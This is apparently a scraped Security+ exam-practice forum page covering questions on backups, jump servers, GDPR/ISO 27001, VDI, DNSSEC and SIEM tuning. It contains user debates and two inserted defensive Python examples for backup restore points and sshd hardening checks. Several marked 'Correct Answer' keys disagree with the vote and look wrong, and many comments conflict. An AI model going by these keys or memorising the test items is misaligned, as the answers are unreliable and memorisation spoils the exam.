The administrator should use the last full backup that was conducted seven days ago to restore services to a secure state. The reason for this is
that full backups contain a complete copy of all data, whereas incremental backups only contain changes made since the last backup. If the
ransomware has been present for 72 hours, it is possible that it has encrypted or modified data during that time. Using the last full backup from
before the infection will ensure that all data and configurations are restored to a secure state, free of any ransomware.
upvoted 2 times

  ronniehaang 4 days, 2 hours ago


The best option to restore services to a secure state would be to use the last full backup that was conducted seven days ago. This ensures
that the compromised files and data from the past 72 hours are not included in the restored version, thereby reducing the risk of the
ransomware spreading again. The administrator should also investigate the cause of the compromise to ensure that it does not happen again
in the future.
upvoted 1 times

  6and0 1 month, 2 weeks ago


Selected Answer: C
A - No - The last incremental backup that was conducted 72 hours ago - If we can say the infection happened 72 hours ago then a backup from
72 hours ago does us no good.
B - No - The last known-good configuration - This would reverse all non-security-related changes made to the Registry during the last session.
Thus the system may still be infected.
C - Yes! - The last full backup that was conducted seven days ago
D - No - The baseline OS configuration - Would remove the possibility of the system being infected but would not be the quickest method
upvoted 2 times
  StripedGiraffe 1 month, 2 weeks ago
from iosafe.com

Full Backup
This is the most time-consuming backup of all methods to perform and may put a strain on your network if the backup is occurring on the
network. But it's also the quickest to restore from because all the files you need are contained in the same backup set.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best option for the administrator to restore services to a secure state would be to use the last known-good configuration. This will allow the
administrator to revert the system to a known good state before the ransomware was able to compromise the server. Option A, the last
incremental backup that was conducted 72 hours ago, may still contain the ransomware, since it was conducted while the ransomware was
already present on the server. Option C, the last full backup that was conducted seven days ago, may not have the most up-to-date information
and may not be able to restore the system to a usable state. Option D, the baseline OS configuration, may not include any customizations or
configurations that have been made to the server since it was initially set up
upvoted 3 times

  smudder 1 month, 3 weeks ago


Selected Answer: B
The best option in this scenario would be to restore services using the last known-good configuration. This will allow the systems administrator to
bring the services back online quickly and securely, without having to worry about any potential lingering effects of the ransomware. By restoring
services using a known-good configuration, the administrator can be confident that the services will be running in a secure and stable state.

It is important to note that in order to prevent future ransomware attacks, the administrator will need to take additional steps to secure the server
and prevent similar attacks from happening again. This might include implementing additional security measures, such as antivirus software,
firewalls, and regular backups.
upvoted 1 times

  Nome02 2 months ago


Correct is A. Very sad that many folks don't even know what an incremental backup is. An incremental restore automatically goes back to the good full
backup and, after the full backup, just applies the delta up to the incremental backup. If we go for option C, then we are losing 4 days of data.
upvoted 2 times

  babyzilla 2 months, 2 weeks ago


Selected Answer: C
B and C are out because it deals with configs. Even though A could work, I would feel more comfortable with C as it goes further back in time
with a full backup. Who actually knows how long the remnants of the attack have been on the system.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
You'll need a full backup to recover from a ransomware attack. As the last full backup is also older than the time the ransomware was planted
on the server, you should be fine with this backup
upvoted 5 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
It requires an attacker to place the ransomware in the system in the first place, so they placed it in the system 72 hours ago, hence they exploited
whatever vulnerabilities were on the system 72 hours ago. It's best to start afresh and then check for vulnerabilities on the system, in case you
risk re-running the attack again...
upvoted 2 times

  Knowledge33 3 months ago


Selected Answer: A
A and C are correct, but A is better. What is the reason to lose all 7 days of data? The last incremental backup is enough to avoid the ransomware.
C is very drastic. Why not erase all servers? Lol
upvoted 1 times

  lordguck 3 months ago


More information is needed for this question. The nature of the web server decides what is best to do. If the data (e.g. SQL DB) is on another server
and the server is responsible for the web interface: B. If the server is part of a standardized web server cluster (e.g. Google/Facebook): D. C: if the 72h
version is already compromised and there is no inc/diff backup before that.
As there is not enough information to go by, I toss my hat for A
upvoted 1 times

  [Removed] 3 months, 1 week ago


Definitely C... and that's also pretty sketch bc those 7 day old backups will also probably be encrypted. Given the question presented this is the
best answer.
upvoted 1 times

  jspecht 3 months, 1 week ago


Selected Answer: C
Restoring from a full backup that is 7 days old is going to be faster than restoring from a full backup + the incrementals to restore to 3 days ago.

Plus, this is a web server, which shouldn't change that much in 7 days (unless new code is deployed) making C the best answer.
upvoted 1 times

  03allen 3 months, 2 weeks ago


Selected Answer: C
go with C, an incremental backup should rely on a full backup?
upvoted 2 times
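To make the A-versus-C argument in this thread concrete, here is an added Python helper (not from the thread, and not any backup product's API) that picks the latest backup taken before the ransomware's earliest believed presence and lists the chain of sets needed to restore it, including Nome02's point that an incremental is only usable on top of its full, and jspecht's option of restoring from a full set alone. The timeline is constructed from the question: a full seven days ago, daily incrementals, the newest one 72 hours ago; the names and the detection timestamp are my own assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List


@dataclass(frozen=True)
class Backup:
    taken_at: datetime
    kind: str            # "full", "incremental" or "differential"


def restore_chain(backups: List[Backup], target: Backup) -> List[Backup]:
    """Every backup set that must be applied, in order, to rebuild `target`.

    A full backup stands alone. A differential needs the last full before it.
    An incremental needs the last full plus every incremental after that full,
    up to and including the target.
    """
    ordered = sorted(backups, key=lambda b: b.taken_at)
    fulls = [b for b in ordered if b.kind == "full" and b.taken_at <= target.taken_at]
    if not fulls:
        raise ValueError("no full backup precedes the chosen restore point")
    base = fulls[-1]
    if target.kind == "full":
        return [base]
    if target.kind == "differential":
        return [base, target]
    incs = [b for b in ordered
            if b.kind == "incremental" and base.taken_at < b.taken_at <= target.taken_at]
    return [base] + incs


def clean_restore_point(backups, detected_at, dwell, safety_margin=timedelta(0), full_only=False):
    """Latest backup taken strictly before the ransomware's earliest believed presence.

    dwell: how long the malware is believed to have been on the host (72 h in the question).
    safety_margin: extra time subtracted, because dwell estimates are usually optimistic.
    full_only: restore from a full set only (no chain dependency, fewer sets to apply).
    Returns (chosen backup or None, chain of sets to apply in order).
    """
    earliest_compromise = detected_at - dwell - safety_margin
    candidates = [b for b in backups
                  if b.taken_at < earliest_compromise and (not full_only or b.kind == "full")]
    if not candidates:
        return None, []          # nothing on hand predates the compromise: rebuild from scratch
    chosen = max(candidates, key=lambda b: b.taken_at)
    return chosen, restore_chain(backups, chosen)


def question_scenario():
    """Constructed timeline matching the question: full 7 days ago, daily incrementals,
    the newest incremental 72 h ago (when the ransomware is believed to have arrived)."""
    now = datetime(2023, 2, 4, 19, 26)          # constructed "detection" time
    day = timedelta(days=1)
    backups = [Backup(now - 7 * day, "full")]
    backups += [Backup(now - d * day, "incremental") for d in (6, 5, 4, 3)]
    return now, backups


if __name__ == "__main__":
    now, backups = question_scenario()
    chosen, chain = clean_restore_point(backups, now, timedelta(hours=72))
    print("restore point:", chosen)
    print("apply in order:", [(b.kind, b.taken_at.date().isoformat()) for b in chain])
```

Note that with the question's timeline the 72-hour incremental is never chosen: it was taken while the ransomware was already present, so the helper falls back to the previous incremental (or, with full_only, to the seven-day full).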

Question #191 Topic 1

A network engineer created two subnets that will be used for production and development servers. Per security policy production and
development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be
deployed so that server administrators can access these devices?

A. VLANs

B. Internet proxy servers

C. NIDS

D. Jump servers

Correct Answer: A

Community vote distribution


D (86%) 14%

  stoneface Highly Voted  5 months ago


Selected Answer: D
A jump server, jump host or jump box is a system on a network used to access and manage devices in a separate security zone. A jump server is
a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them
upvoted 20 times

  i_bird 4 months, 2 weeks ago


Jump server...how??
your explanation does not correlate with the question asked.

Ans = A
Disagree
upvoted 3 times

  Knowledge33 3 months ago


The response is D. Why do you need VLAN while the separated networks are already created by the network engineer? Please read the
question again.
upvoted 3 times

  i_bird 4 months, 2 weeks ago


On second thought, a jump server seems reasonable since it's a medium to access devices in both envs.
upvoted 4 times

  zzzfox 4 months, 3 weeks ago


Disagree, Yes jump server is used to access a secure network zone. For example, external clients need to access the jump server then they
can access the web/application server. But it doesn't mean that the jump server will separate the access to production and dev servers.
hence I would go VLANs.
upvoted 9 times

  asum Most Recent  2 weeks, 2 days ago


Selected Answer: A
VLAN (virtual local area network): A logically separate network, created by using switching technology. Even though hosts on two VLANs may be
physically connected to the same cabling, local traffic is isolated to each VLAN so they must use a router to communicate.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
To allow server administrators to access production and development servers on separate networks, while also complying with the security
policy that prohibits direct communication between these networks, the network engineer should deploy jump servers. Jump servers, also known
as bastion hosts or access servers, are secure servers that are placed on both networks and can be accessed remotely by authorized users.
These servers provide a secure and controlled way for users to access the production and development servers on their respective networks,
without allowing direct communication between the networks. This makes jump servers an ideal solution for this situation. VLANs, internet proxy
servers, and NIDS (network intrusion detection systems) are not relevant in this scenario, as they do not address the requirement for controlled
access to separate networks
upvoted 1 times

  GetBuckets 1 month, 4 weeks ago

Being CCNA certified twice, that’s VLAN to me, so it’s A.


upvoted 4 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Jump Servers

The question is not asking for a method to separate the networks, it's asking for a method for accessing devices from networks that shouldn't
communicate with each other.

Jump servers or jump boxes are systems used to access and manage devices in a separate security zone, so they make the most sense as an
option to deploy as they're trying to access devices on a separate network.

Regarding the VLANs, while the question mentions that the network engineer has already created two subnets, it doesn't mean that VLANs are
implemented (subnet != VLAN). Subnets are just blocks of IP addresses while VLANs are devices logically grouped together. Assigning VLANs can
span across multiple subnets.
upvoted 2 times

  DanteSurman 2 months, 3 weeks ago


Answer is A. VLAN.
From Clarke G COMPTIA:
" You can use VLANs on a switch to break the network down into multiple virtual LANs. Systems in one VLAN are, by default, unable to
communicate with systems in another VLAN"
upvoted 1 times

  DanteSurman 2 months, 3 weeks ago


Sorry. Answer is D. Jump Server
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: D
The question has the word "policy", hence meaning that the VLANs were already configured/implemented; now it's just asking what the best
way to access these VLANs is...
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


The wording is very tricky, but it's like reading paragraphs in one sentence; other times it's just common sense lolz
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: D
It's D. Because the question DESCRIBES a VLAN...you don't deploy a VLAN to access a VLAN. It's asking what medium needs to be created.
The medium is the "jump server"...I'm almost certain something like this will be on the test simply because it's confusing
upvoted 3 times

  ostralo 3 months, 3 weeks ago


Once you know what systems require this extra layer of protection, you can define the shape of the trust boundary. The most common tools for
this are network security devices like firewalls or virtual LANs (VLANs). Either way, these devices are also part of the assets that fall in scope for
management through the jump box.

https://www.f5.com/labs/articles/cisotociso/protecting-critical-systems-with-isolation-and-jump-boxes

Please check the image in the link.


upvoted 1 times

  ostralo 3 months, 3 weeks ago


Which of the following should be deployed so that server administrators can access these devices?

We can use VLAN to separate the two networks but it doesn't provide access to the admin.
For admin to be able to access, we need to create jump servers.
upvoted 1 times

  omodara 4 months, 1 week ago


D is the answer. A jump box is a hardened machine for segregating administrator access. There are already two subnets for prod and dev,
meaning each is already on a different subnet. The question asked how the server administrators can access these devices, so D is
correct
upvoted 2 times

  Bodatiousbob 4 months, 1 week ago


Selected Answer: D
Even though VLAN would work as well, the ending that says "deployed" makes me think physical and Jump Server would fit the bill. VLANs are
"configured/implemented" more so than "deployed". CompTIA is purposely terrible with wording...
upvoted 1 times

  serginljr 4 months, 1 week ago


Selected Answer: D
It's D.

Taken from the Textbook:

An important security concept common in managing screened subnets is a jump server or jump box. A jump server is a system used to access
systems in different security zones, such as a screened subnet. It is an especially hardened system just for this purpose that provides a method
to access resources in the screened subnet from the protected network via other trusted systems.
upvoted 2 times
  CertAddict69 4 months, 2 weeks ago
Selected Answer: A
I think this is A for the reason zzzfox has explained, I'm going to do more research on jump servers though.
upvoted 1 times

  Lars87 4 months, 3 weeks ago


Selected Answer: A
no doubt
upvoted 3 times

Question #192 Topic 1

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with
international standards.
With which of the following is the company's data protection officer MOST likely concerned?

A. NIST Framework

B. ISO 27001

C. GDPR

D. PCI-DSS

Correct Answer: A

Community vote distribution


B (89%) 11%

  jgp Highly Voted  4 months, 4 weeks ago


Selected Answer: B
They don't specify Europe and ISO 27001 is the international standard
upvoted 18 times

  Joe1984 Highly Voted  5 months ago


This should be GDPR.
upvoted 12 times

  BigLao 3 months ago


No, GDPR is limited to Europe, question says, global market
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


It should not be Joe.
upvoted 3 times

  ronniehaang Most Recent  4 days, 2 hours ago


Selected Answer: C
The social media company's data protection officer is MOST likely concerned with the General Data Protection Regulation (GDPR). GDPR is a
regulation that protects the privacy and personal data of individuals within the European Union (EU). As the company is expanding into new
global markets, it must maintain compliance with international standards and ensure that the personal data of individuals in the EU is protected
according to the GDPR guidelines.
upvoted 1 times

  amberlj102 2 months, 1 week ago


Here is an explanation on how GDPR can apply outside of EU https://gdpr.eu/companies-outside-of-europe/

The best answer here is ISO 27001 but if that was not an option it would be GDPR
upvoted 1 times

  babyzilla 2 months, 2 weeks ago


Selected Answer: B
Come on, people. Just google ISO 27001 and you will see it is the only clear answer. GDPR was the answer for another question on here and it
was specifically for Europe. Please don't confuse others by being incorrect and confident lol
upvoted 3 times

atrax 3 months, 2 weeks ago
Selected Answer: C
GDPR for me
upvoted 1 times

Skelter117 3 months, 2 weeks ago
Selected Answer: C
They do not specifically include Europe, but if they are looking to expand globally then Europe may be an area whose regulations they need to learn or be compliant with, which would be GDPR. Does that make sense?
upvoted 2 times

deeden 4 months, 1 week ago
Selected Answer: B
ISO 27001 is an international standard, and companies serving global markets will want to be certified to stay competitive. Although GDPR is a law and not a standard, it is still a concern when serving EU customers. In addition, ISO 27001 talks about complying with laws and regulations for those in scope of a company's ISMS, which may very well include GDPR, among others.
upvoted 2 times
Heroofatea 4 months, 1 week ago
Selected Answer: C
GDPR for working with EU customers data
upvoted 1 times

Sandon 1 month, 3 weeks ago
The question never mentioned the EU, so no.
upvoted 1 times

Heroofatea 4 months, 1 week ago
Also ISO 27001 is not mandatory in EU + data protection officer was hired in our company because of GDPR
upvoted 1 times

passmemo 4 months, 2 weeks ago
Selected Answer: B
ISO/IEC 27001 is an international standard on how to manage information security
upvoted 4 times

hazeleyes 4 months, 3 weeks ago
Selected Answer: B
GDPR is neither international (it's European) nor a standard (it's a law). The answer is ISO 27001.
upvoted 5 times

anonimouse2 4 months, 4 weeks ago
As someone who worked in GRC, this is definitely referring to ISO 27001. The clue is in the name.
upvoted 7 times

varun0 4 months, 4 weeks ago
Selected Answer: C
A data protection officer will be concerned about privacy, so GDPR.
upvoted 1 times

Swarupam 5 months ago
Selected Answer: B
GDPR is mainly related to protection of personal data whereas the "international standard for compliance" is something more related to ISO
27001
upvoted 6 times

k9_462 5 months ago
Selected Answer: B
"NIST is considered best for organizations that are in the early stages of developing a risk management plan. ISO 27001, comparatively, is better
for operationally mature organizations."

since the social media company is already established, it may be safe to assume they are "operationally mature"
upvoted 5 times

k9_462 5 months ago
Selected Answer: B
Since they didn't specify the EU, I would rule out the GDPR and choose B. ISO 27001 is an international standard on how to manage information security.
upvoted 4 times

Joe1984 5 months ago
Thinking this is GDPR.
upvoted 7 times

RodIT 2 weeks, 1 day ago
A is the correct answer
NIST is the organization that sets framework and controls for optimal security configuration in US
ISO is international, GDPR is for EU
upvoted 1 times


Question #193 Topic 1

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens.
Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following
should the security architect recommend to BEST meet the requirement?

A. Fog computing and KVMs

B. VDI and thin clients

C. Private cloud and DLP

D. Full drive encryption and thick clients

Correct Answer: B

Community vote distribution


B (100%)

stoneface Highly Voted 5 months ago
Selected Answer: B
VDI and thin clients.
upvoted 9 times

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: B
Answer: VDI and thin clients

Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts
desktop environments on a centralized server and deploys them to end-users on request. VDI can be used to provide the desktop experience.

The computing hardware for VDI can be split into thin clients and thick clients:

- Thin clients are simple computers that can be accessed through a remote connection to a central server, which provides the client all of its resources. Thin clients do not have hard drives, so data isn't stored locally, and applications would also need to be accessed through a server. Thin clients would work for this scenario since data can't be stored in the conference rooms and thin clients can't store data anyway.

- Thick clients are fully functional networked computers that have their own OS and local storage and handle their own processing. Just think company-provided desktop computers or laptops. They can connect to a server if they want, but can work independently as well. Since files can be stored locally on a thick client, they wouldn't work with the requirements of the scenario.
upvoted 8 times

andrizo Most Recent 3 months, 3 weeks ago
NAC should've been an answer
upvoted 1 times

kennyleung0514 3 months, 3 weeks ago
Selected Answer: B
As this is for display, it should not be necessary to store data.
Using thin client + VDI would be the best, and easy to restore to default settings.
upvoted 1 times

RonWonkers 4 months, 1 week ago
Selected Answer: B
Agree with B
upvoted 1 times

Jakalan7 4 months, 2 weeks ago
Dear lord, I wonder who writes some of these questions. This one is worded so poorly it nearly gave me an aneurysm.

I'll go with the majority - B.


upvoted 1 times

Sandon 1 week, 3 days ago
This one wasn't that tough honestly
upvoted 1 times

hazeleyes 4 months, 3 weeks ago
Selected Answer: B
Thin client so it doesn't store data, VDI so it has access to the material on display.
upvoted 3 times

Question #194 Topic 1

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the
following solutions should be implemented?

A. DNSSEC

B. LDAPS

C. NGFW

D. DLP

Correct Answer: A

Community vote distribution


A (100%)

okay123 Highly Voted 5 months ago
A zone file is a text-based file with a format defined in RFC 1035 and 1034 and is stored on a DNS server (name server). Zone files contain the IP and name data, MX records and other service records. They also contain glue data that connects them to the other DNS servers. The default behavior for DNS zone transfer permits any host to request and receive a full zone transfer for a domain. This is a security issue since DNS data can be used to decipher the topology of a company's network. The information obtained can be used for malicious exploitation such as DNS poisoning/spoofing. This is like an anonymous person calling the receptionist to request and receive the entire company's telephone and address book.

https://www.giac.org/paper/gsec/2668/securing-dns-zone-transfer/104562
upvoted 12 times

rodwave Most Recent 2 months, 3 weeks ago
Selected Answer: A
Domain Name System Security Extensions (DNSSEC) is a set of specifications that extend the DNS protocol by adding cryptographic authentication
upvoted 1 times

comeragh 4 months ago
Selected Answer: A
Zone transfers - DNS related. Agree with A being the correct answer here.
upvoted 2 times

gen2dee 4 months, 2 weeks ago
Selected Answer: A
correct
upvoted 3 times


Question #195 Topic 1

Which of the following controls is used to make an organization initially aware of a data compromise?

A. Protective

B. Preventative

C. Corrective

D. Detective

Correct Answer: D

Community vote distribution


D (100%)

rodwave 2 months, 3 weeks ago
Selected Answer: D
Answer: Detective

Detective control identifies security events that have already occurred. Intrusion detection systems are detective controls.
=======================
Preventative Controls - acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack
can take place. They are comparing the configurations to a secure guideline to ensure no gaps. Meaning they are pre-emptively hardening their
systems against future attack vectors.

Corrective Controls - controls that remediate security issues that have already occurred. Restoring backups after a ransomware attack is an
example of a corrective control.
upvoted 1 times

Knowledge33 3 months ago
Selected Answer: D
Detective controls act during an event, alerting operators to specific conditions.
upvoted 1 times

db97 4 months, 1 week ago
initially aware of a data compromise -> that sounds more like a preventive control
upvoted 2 times

db97 4 months, 1 week ago
Disregard that; I was thinking from an awareness training perspective, but if it is a real data compromise being communicated then it is Detective.
upvoted 2 times

RonWonkers 4 months, 1 week ago
Selected Answer: D
Agree with D
upvoted 1 times


Question #196 Topic 1

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening
standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

A. CIS benchmarks

B. GDPR guidance

C. Regional regulations

D. ISO 27001 standards

Correct Answer: A

Community vote distribution


A (100%)

stoneface Highly Voted 5 months ago
Selected Answer: A
CIS Benchmarking -> CIS Benchmarks from the Center for Internet Security (CIS) are a set of globally recognized and consensus-driven best practices to help security practitioners implement and manage their cybersecurity defenses.
upvoted 13 times
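What "updating and reconfiguring OS-level security configurations against a benchmark" looks like in practice is a drift check: parse the live configuration, compare each directive with the hardened value, and report what is missing or wrong. The following is an added example, not code from the page or from CIS; the BASELINE it uses is an illustrative subset modelled on common CIS-style sshd recommendations (assumption: consult the actual CIS Benchmark for your OS for the authoritative keys and values), and the sshd_config it inspects is constructed for the example.

```python
"""Compare an sshd_config against a hardening baseline and report drift.

Added example, not from the page or from CIS. BASELINE is an illustrative
subset modelled on common CIS-style sshd recommendations (assumption:
the real CIS Benchmark is the authoritative source for keys and values).
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Constructed sample sshd_config; deliberately contains several drifts.
SAMPLE_SSHD_CONFIG = """\
# constructed sample config, not from a real host
Port 22
Protocol 2
LogLevel INFO
PermitRootLogin yes
MaxAuthTries 10
X11Forwarding yes
PermitEmptyPasswords no
#ClientAliveInterval 300
"""


@dataclass(frozen=True)
class Rule:
    key: str                       # sshd keyword (case-insensitive)
    check: Callable[[str], bool]   # True when the configured value is compliant
    expected: str                  # human-readable expectation for the report


def _is_no(value: str) -> bool:
    return value.lower() == "no"


def _int_in_range(lo: int, hi: int) -> Callable[[str], bool]:
    return lambda v: v.isdigit() and lo <= int(v) <= hi


BASELINE: List[Rule] = [
    Rule("PermitRootLogin", _is_no, "no"),
    Rule("MaxAuthTries", _int_in_range(1, 4), "4 or less"),
    Rule("X11Forwarding", _is_no, "no"),
    Rule("PermitEmptyPasswords", _is_no, "no"),
    Rule("LogLevel", lambda v: v.upper() in ("INFO", "VERBOSE"), "INFO or VERBOSE"),
    Rule("ClientAliveInterval", _int_in_range(1, 300), "between 1 and 300"),
]


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return {keyword: value} following sshd's own rules: comments and blank
    lines are ignored, keywords are case-insensitive, and the FIRST occurrence
    of a keyword wins. (Match blocks are not modelled here.)"""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def check_config(text: str, baseline: List[Rule] = BASELINE) -> List[Tuple[str, str, str]]:
    """Return (keyword, current value, expected) for every rule that fails.
    A commented-out or missing directive counts as drift, because sshd then
    falls back to its compiled-in default instead of the hardened value."""
    settings = parse_sshd_config(text)
    findings = []
    for rule in baseline:
        value = settings.get(rule.key.lower())
        if value is None:
            findings.append((rule.key, "<unset>", rule.expected))
        elif not rule.check(value):
            findings.append((rule.key, value, rule.expected))
    return findings


if __name__ == "__main__":
    for key, current, expected in check_config(SAMPLE_SSHD_CONFIG):
        print(f"DRIFT {key}: current={current!r} expected={expected}")
```

Running it against the constructed file reports four drifts (root login, MaxAuthTries, X11 forwarding, and the commented-out ClientAliveInterval); the same loop can be pointed at /etc/ssh/sshd_config on a real host, and extended with rules for sysctl or PAM files, which is the form most benchmark-checking tools take.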

okay123 Most Recent 1 month, 3 weeks ago
Selected Answer: A
CIS Benchmarks for mobile devices cover security configurations for operating systems that run on mobile phones, tablets, and other hand-held devices.

ISO/IEC 27001 is an information security management standard that structures how businesses should manage risk associated with information security threats.

The General Data Protection Regulation sets guidelines for the collection and processing of personal data of individuals within the European Union; it's about how organizations should handle the personal data of individuals.
upvoted 2 times

RonWonkers 4 months, 1 week ago
Selected Answer: A
It is A
upvoted 3 times

pgonza 2 months, 2 weeks ago
Why A?
upvoted 1 times


Question #197 Topic 1

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The
company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

A. High availability

B. Application security

C. Segmentation

D. Integration and auditing

Correct Answer: D

Community vote distribution


D (65%) A (30%) 4%

varun0 Highly Voted 5 months ago
Selected Answer: D
Integrate the components in cloud and then audit them to ensure performance and security are working to expectations
upvoted 10 times

ronniehaang Most Recent 4 days, 1 hour ago
Selected Answer: A
A. High availability is the BEST option that meets both the performance and security requirements of the company. High availability involves
creating a highly available network infrastructure that can automatically detect and recover from outages or failures. This can be achieved
through the use of redundant components and the implementation of load balancing, failover mechanisms, and disaster recovery plans. High
availability ensures that the network remains available to users and that data is protected, even in the event of an outage or failure, thus meeting
both performance and security requirements.
upvoted 1 times

ronniehaang 4 days, 1 hour ago
A. High availability is a design pattern that ensures that cloud-based network services are continuously operational and accessible, even in
the event of system failures or network outages. By using high availability techniques, the company can ensure that its cloud-based network
services remain secure and performant, even during unexpected disruptions. This helps to ensure that performance and security remain intact
and the company can continue to provide reliable services to its customers.
upvoted 1 times

jaspernutta 1 month ago
A.
High availability refers to the ability of a system or service to remain operational and available to users with minimal downtime. By ensuring high
availability, the company can maintain good performance and ensure that users have access to the network services they need. High availability
can also improve security, as it helps to prevent disruptions that could potentially be caused by security incidents or other issues.
upvoted 2 times

Sandon 1 week, 3 days ago
Negative ghostrider
upvoted 1 times

nicekoda 1 month, 1 week ago
Segmentation eliminates the flaws of flat networks. Segmenting a network also leads to better performance due to less congestion.
upvoted 1 times

Sandon 1 week, 3 days ago
That ain't it buddy
upvoted 1 times

Ranaer 1 month, 1 week ago
Selected Answer: A
It's A; everyone selecting a different answer isn't thinking this through. I see many comments saying security isn't part of HA. This is false. If your service can be brought down by a DDoS, it wouldn't have HA, which is why security is a core component of HA.
Application security doesn't affect performance.
Segmentation doesn't affect performance.
Integration and auditing is an important part of bringing the new companies' services and applications into the main company, but still this is a one-time thing, while HA is something that matters constantly throughout time.
upvoted 1 times

Sandon 1 week, 3 days ago
You couldn't be more wrong, good luck
upvoted 1 times


ebeewhy 1 month, 2 weeks ago
Selected Answer: C
I have to go with segmentation. "HA is certainly a part of a risk management plan, but it can also only mitigate certain risks. HA does nothing to
mitigate the risks of data inconsistency, a lack of security or shoddy compliance." It says nothing about wanting to integrate the companies, so
the only way to maintain security and performance is to separate them. Auditing only allows you to find security vulnerabilities but does not
maintain security like keeping them separate would.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The company should implement high availability to meet both performance and security requirements. High availability refers to the ability of a
system or service to remain available and functioning even in the event of hardware or software failures. By implementing high availability, the
company can ensure that network services remain available and performant even if there are disruptions or failures in the cloud environment. This
will also help to maintain the security of the network services, as they will continue to be available and functioning even if there are issues with
the underlying infrastructure. Segmentation, application security, and integration and auditing are all important for maintaining security and
performance, but high availability is the solution that specifically addresses both requirements
upvoted 2 times

Sandon 1 month, 3 weeks ago
That ain't it. High availability does not ensure security.
upvoted 1 times

Ranaer 1 month, 1 week ago
I beg to differ. If your system is susceptible to a DDoS, this would bring it down, thus making it not available. Security is a core component of high availability.
upvoted 1 times

Tomtom11 3 months, 1 week ago
Selected Answer: D
The integration of the appropriate level and quantity of security controls is a subject that is always being audited. Are the controls appropriate? Are they placed and used correctly? Most importantly, are they effective? These are standard IT audit elements in the enterprise. The moving of computing resources to the cloud does not change the need or intent of audit functions.
upvoted 3 times

passmemo 4 months, 2 weeks ago
Selected Answer: D
For sure
upvoted 1 times

Nichgs 4 months, 3 weeks ago
Should it be Segmentation? It provides security and performance
upvoted 3 times

Dachosenone 4 months, 4 weeks ago
Selected Answer: D
High availability does not guarantee that security remains intact, while auditing may detect vulnerabilities and threats, displaying weak links, poor configurations, and high-risk practices. So I'm going with D.
upvoted 1 times

okay123 5 months ago
Selected Answer: A
High availability means that an IT system, component, or application can operate at a high level, continuously, without intervention, for a given
time period. High-availability infrastructure is configured to deliver quality performance and handle different loads and failures with minimal or
zero downtime.

I think it's A..


upvoted 3 times

andrizo 3 months, 3 weeks ago
But no security
upvoted 3 times


Question #198 Topic 1

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder
data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern?

A. PCI DSS

B. GDPR

C. ISO 27001

D. NIST CSF

Correct Answer: A

Community vote distribution


A (100%)

banditring Highly Voted 5 months ago
keyword in this question is cardholder
upvoted 13 times

passmemo Highly Voted 4 months, 2 weeks ago
Selected Answer: A
Payment Card Industry
upvoted 6 times

RonWonkers Most Recent 4 months, 1 week ago
Selected Answer: A
cardholder = PCI DSS
upvoted 3 times


Question #199 Topic 1

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to
create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

A. Adjust the data flow from authentication sources to the SIEM.

B. Disable email alerting and review the SIEM directly.

C. Adjust the sensitivity levels of the SIEM correlation engine.

D. Utilize behavioral analysis to enable the SIEM's learning mode.

Correct Answer: B

Community vote distribution


D (93%) 7%

stoneface Highly Voted 5 months ago
Selected Answer: D
D is the answer
upvoted 9 times

Swarupam 5 months ago
Could you please explain the reason as well? I am confused between C & D
upvoted 1 times

enginne 4 months, 2 weeks ago
No info about duplicates according to answer C, "SIEM correlation engine". D is correct.
upvoted 2 times

FMMIR 1 month, 3 weeks ago
Selected Answer: C
This is confusing again. But I believe the answer C.

The security analyst should adjust the sensitivity levels of the SIEM correlation engine to reduce the number of alerts and create a baseline of
normal operations. A SIEM, or security information and event management, system aggregates and analyzes log data from various sources in
real-time. The correlation engine is the component of the SIEM that processes the log data and identifies potential security incidents. By
adjusting the sensitivity levels of the correlation engine, the security analyst can control the number and types of alerts that are generated. This
can help reduce the number of false positives and create a baseline of normal operations, allowing the security analyst to focus on investigating
only the most relevant alerts. Disabling email alerting and reviewing the SIEM directly, adjusting the data flow from authentication sources, and
utilizing behavioral analysis are not directly related to reducing the number of alerts or creating a baseline of normal operations.
upvoted 1 times

Sandon 1 month, 3 weeks ago
Wrong, again.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: D
Answer: Utilize behavioral analysis to enable the SIEM's learning mode.

UBA, or User Behavior Analytics, is a threat detection analysis technology that uses AI to understand how users normally behave and then find anomalous activities, which deviate from their normal behavior and may be indicative of a threat.

For this scenario, the SIEM will first learn what is normal behavior then when a baseline is created, it will know if any of the logins are malicious.
